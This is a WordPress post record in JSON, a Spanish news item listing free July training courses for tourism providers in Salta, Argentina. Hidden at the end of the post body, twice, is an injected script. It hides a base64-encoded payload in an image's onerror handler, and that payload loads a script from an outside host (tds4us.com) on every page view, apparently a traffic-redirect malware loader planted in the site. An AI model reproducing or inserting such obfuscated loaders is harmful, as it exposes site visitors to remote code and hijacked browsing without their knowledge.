{"id":5315,"date":"2025-07-07T11:24:57","date_gmt":"2025-07-07T14:24:57","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5315"},"modified":"2025-08-13T23:27:29","modified_gmt":"2025-08-14T02:27:29","slug":"nuevas-capacitaciones-gratuitas-para-el-sector-turistico-durante-el-mes-de-julio","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5315","title":{"rendered":"Nuevas capacitaciones gratuitas para el sector tur\u00edstico durante el mes de Julio"},"content":{"rendered":"\n<p><strong><em>En el marco de un trabajo conjunto que el Ministerio de Turismo y Deportes viene desarrollando junto al sector p\u00fablico y privado, se ofrecer\u00e1n cursos gratuitos de capacitaci\u00f3n para el sector tur\u00edstico de la provincia.<\/em><\/strong><\/p>\n\n\n\n<p>El Ministerio de Turismo y Deportes en forma conjunta con la C\u00e1mara de Turismo de Salta, C\u00e1mara Hotelera y Gastron\u00f3mica de Salta, AHT y Bureau Salta dictar\u00e1n, durante el mes de julio, distintos cursos gratuitos de capacitaci\u00f3n destinados a prestadores del sector tur\u00edstico de Salta.<\/p>\n\n\n\n<p>La iniciativa busca brindar herramientas y conocimientos actualizados a los actores del sector, permitiendo mejorar la calidad de los servicios y la competitividad del destino.<\/p>\n\n\n\n<p>Las capacitaciones se desarrollar\u00e1n en modalidades presencial y virtual de acuerdo con el siguiente cronograma:<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; 8,11,14 de julio: Fondo de Emprendedores Tur\u00edsticos, capacitaciones virtuales.<\/p>\n\n\n\n<p>\u00b7&nbsp; &nbsp; &nbsp;7 de julio: 2\u00ba Encuentro Ciclo Formativo para Gestores Tur\u00edsticos Municipales. Presencial en Salta Capital.<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp;10 de julio: Formaci\u00f3n de Sensibilizadores de Cultura Tur\u00edstica Infantil, presencial San Jos\u00e9 de Met\u00e1n.<\/p>\n\n\n\n<p>\u00b7 &nbsp;&nbsp;11 de julio: Neurociencia. Gesti\u00f3n de las emociones, destinado a la Asociaci\u00f3n de Hoteles de Turismo, Filial Salta (AHT).<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp;14 de julio: Formaci\u00f3n de Sensibilizadores de Cultura Tur\u00edstica Infantil, presencial Cerrillos.<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp;16 de julio: Experiencias Tur\u00edsticas en Salta, capacitaci\u00f3n virtual<\/p>\n\n\n\n<p>\u00b7 &nbsp;&nbsp; 23 de julio: Mi lugar, tu destino. Programa de Sensibilizaci\u00f3n Tur\u00edstica, destinado a prestadores del sector tur\u00edstico y comunidad en general de la localidad de La Candelaria.<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp;31 de julio: Primeros Auxilios, a cargo del Dr. Rodolfo Pastore, presencial en La Vi\u00f1a.<\/p>\n\n\n\n<p>A trav\u00e9s de la Direcci\u00f3n de Formaci\u00f3n y Calidad Tur\u00edstica se ponen a disposici\u00f3n del sector tur\u00edstico estas propuestas de capacitaci\u00f3n, dise\u00f1adas para fortalecer el desarrollo profesional, el crecimiento y la sostenibilidad del turismo en Salta.<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n e inscripciones ingresar a &nbsp;www.turismotecapacita.com.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco de un trabajo conjunto que el Ministerio de Turismo y Deportes viene desarrollando junto al sector p\u00fablico y privado, se ofrecer\u00e1n cursos gratuitos de capacitaci\u00f3n para el sector tur\u00edstico de la provincia. El Ministerio de Turismo y Deportes en forma conjunta con la C\u00e1mara de Turismo de Salta, C\u00e1mara Hotelera y Gastron\u00f3mica [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5316,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,11],"tags":[],"class_list":{"0":"post-5315","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5315"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5315"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5315\/revisions"}],"predecessor-version":[{"id":6445,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5315\/revisions\/6445"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5316"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5315"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5315"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5315"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}